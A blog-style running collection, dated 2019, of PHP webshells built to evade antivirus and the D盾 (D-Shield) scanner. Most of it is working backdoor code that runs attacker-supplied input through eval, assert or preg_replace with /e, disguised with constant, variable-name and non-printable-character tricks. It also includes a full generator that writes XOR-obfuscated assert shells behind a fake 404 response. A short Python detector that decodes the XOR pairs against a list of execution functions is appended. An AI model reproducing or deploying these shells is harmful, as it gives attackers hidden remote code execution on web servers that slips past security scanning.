I plan to maintain a long-running, regularly updated summary of AV-evasion webshells.
2019-10-12
Single-character bypass
https://forum.90sec.com/t/topic/513/1
<?php
function test($name){#
    eval($name);
}

test($_GET['code']);
?>
2019-08-15
https://evi1.cn/post/bypass-shell/
<?php
$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";
2019-08-12
2019-08-09
Evasion frenzy
2019-08-07
<?php
function a()
{
    return '' + @$_POST['a'];
}

eval(a());
Another one, using a ternary expression
2019-08-06
Bypassing D盾 (D-Shield) with a constant
https://secquan.org/Notes/1069997
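<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>
Another idea: bypass D盾 via deserialization; write the code yourself.
Yet another idea: bypass D盾 by creating an object and repeatedly defining its member variables.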
2019-05-30
Bypassing D盾 by using non-printable ASCII characters as variable names
https://github.com/th1k404/unishell
<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>
You can modify it yourself.
2019-05-21
https://github.com/yzddmr6/webshell-venom
Uses random XOR to evade D盾 indefinitely
For the AntSword plugin version, see:
https://github.com/yzddmr6/as_webshell_venom
<?php
//code by Mr6
error_reporting(0);
function randomkeys($length)
{
    $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; // generate a PHP random number
    }
    return $key;
}
function randname($length)
{
    $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; // generate a PHP random number
    }
    return $key;
}
$str=randomkeys(6);
$bname=randname(4);
$lname=strrev(strtolower($bname));
$str2="assert";
echo "<?php \n";
echo "header('HTTP/1.1 404');\n";
echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n";
for ($i=0;$i<6;$i++)
{
    $name="_".$i;
    $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
    echo "$"."$name=";
    echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
}
$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
echo $aa;
echo "\n";
echo '@$db ("$this->c");}}';
echo "\n";
echo "\${$lname}=new {$bname}();\n";
echo "@\${$lname}->c=\$_POST['Mr6'];\n";
echo "?>\n";
@$file=$_GET['file'];
$html = ob_get_contents();
if (isset($file)){
    if(file_put_contents($file,$html))
        echo "\n\n\n".$file." save success!";}
else {echo "Please input the file name like '?file=xxx.txt'";}
?>
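For detection, the randomness above changes only the key characters: every generated file still assigns six single-character XOR pairs, concatenates them, and calls the result as a function. The following is an added example (not code from the original page or from the webshell-venom project) that statically folds such pairs back into the hidden function name; the sample fragment, the regular expressions and the `SINKS` watch list are assumptions made for this illustration.

```python
import re

# Constructed sample: a fragment in the shape the generator above emits.
# The key characters and hex bytes were chosen for this example.
SAMPLE = r"""
$_0='K'^"\x2a";
$_1='{'^"\x08";
$_2='!'^"\x52";
$_3='Q'^"\x34";
$_4='|'^"\x0e";
$_5='?'^"\x4b";
$db=$_0.$_1.$_2.$_3.$_4.$_5;
@$db ("$this->c");
"""

# $name='<one char>'^"\x<two hex digits>";
XOR_PAIR = re.compile(r"""\$(\w+)\s*=\s*'(.)'\s*\^\s*"\\x([0-9a-fA-F]{2})"\s*;""")
# $target=$a.$b.$c;
CONCAT = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+\s*\.\s*)+\$\w+)\s*;")
# $var( ... ): a variable used as a function name
DYN_CALL = re.compile(r"\$(\w+)\s*\(")
# Assumed watch list of code-execution functions; extend as needed.
SINKS = {"assert", "system", "exec", "passthru", "shell_exec", "create_function"}


def fold_xor_strings(php_source):
    """Return {variable: decoded string} for XOR pairs and their concatenations."""
    resolved = {name: chr(ord(key) ^ int(hx, 16))
                for name, key, hx in XOR_PAIR.findall(php_source)}
    for target, expr in CONCAT.findall(php_source):
        parts = [p.strip().lstrip("$") for p in expr.split(".")]
        if all(p in resolved for p in parts):
            resolved[target] = "".join(resolved[p] for p in parts)
    return resolved


def find_hidden_calls(php_source):
    """Return (variable, function) for dynamic calls that decode to a sink."""
    resolved = fold_xor_strings(php_source)
    return [(var, resolved[var].lower())
            for var in DYN_CALL.findall(php_source)
            if resolved.get(var, "").lower() in SINKS]


if __name__ == "__main__":
    print(find_hidden_calls(SAMPLE))
```

Because the check decodes the constants instead of matching them, it gives the same result for any key characters the generator picks.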
2019-05-11
<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}
The pattern that emerges is that when an already-defined variable has the same name as the loop variable, D盾 is less sensitive.